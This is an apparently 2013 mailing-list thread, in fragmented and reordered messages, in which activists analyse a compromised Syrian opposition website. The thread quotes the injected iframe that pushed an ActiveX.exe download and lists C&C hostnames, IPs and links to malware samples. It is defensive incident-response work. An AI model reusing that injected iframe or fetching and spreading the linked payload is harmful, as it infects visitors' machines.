-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Dear List,
Here are more details, with credit to Team Cymru:
http://www.team-cymru.org/
> C&C nodes for this version:
>
> melaniibaby.no-ip.biz 173.0.10.52
> ghostsx.8866.org 192.168.11.1 (so not likely to connect)
> awrasx10.no-ip.biz 95.170.198.
Hello,
I wrote a first summary on the case, I will try to keep it up to date
with new data,
https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/
All the best,
KheOps
On 30/01/2013 00:00, SiNA Rabbani wrote:
>
> Hi!
>
> I sent the m
Many thanks for posting. I'll spread this to my Syrian friends just to
be aware of this.
All the best,
Hadi
On 01/29/2013 11:05 PM, KheOps wrote:
> Dear Libtech,
>
> We just saw that the website: http://www.syrian-martyrs.com is probably
> compromised. Every page of the website contains an iFr
Hello,
On 30/01/2013 03:02, SiNA Rabbani wrote:
> Ok. I infected an old Windows XP with this malware and it keeps
> sending SYN requests to this hostname: awrasx10.no-ip.biz which
> currently resolved to: 37.236.124.197 and is down for me.
Thank you for your work :) The hostname still resolves
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Ok. I infected an old Windows XP with this malware and it keeps
sending SYN requests to this hostname: awrasx10.no-ip.biz which
currently resolved to: 37.236.124.197 and is down for me.
- --SiNA
Internet Protocol Version 4, Src: 10.10.10.17 (10.10.1
Hi!
I sent the malware to a couple of friends that have a setup ready. If
you want to try this it might be fun:
http://docs.cuckoosandbox.org/en/latest/
All the best,
SiNA
KheOps:
> Hey,
>
> On 29/01/2013 23:34, SiNA Rabbani wrote:
>> This is the malware:
>>> https://www.virustotal.com/fil
Just a heads up, the site's been taken down, malware is here:
https://resources.telecomix.ceops.eu/material/malwares/
Also looking at getting access to the server in question for forensics.
-Andrew
On Jan 30, 2013, at 11:34 AM, SiNA Rabbani wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Hey,
On 29/01/2013 23:34, SiNA Rabbani wrote:
> This is the malware:
>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
Yes, saw that too.
However, I don't find any precise description of its behaviour. Like,
what it does, if it opens
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
This is the malware:
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
- --SiNA
SiNA Rabbani:
> holy shit:
>
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.ex
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
holy shit:
http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe";
border="0"
frameborder="0">
:/ if you are running windows don't even go there!!!
Andrew Lewis:
> I can get to this in 6 hours or so, maybe someone is willing to
> ju
I can get to this in 6 hours or so, maybe someone is willing to jump
on this before then?
-Andrew
On Jan 30, 2013, at 11:06 AM, KheOps wrote:
> Dear Libtech,
>
> We just saw that the website: http://www.syrian-martyrs.com is probably
> compromised. Every page of the website contains an iFrame
Dear Libtech,
We just saw that the website: http://www.syrian-martyrs.com is probably
compromised. Every page of the website contains an iFrame which links to
a .exe file which is detected as a virus by antivirus software:
http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
The fac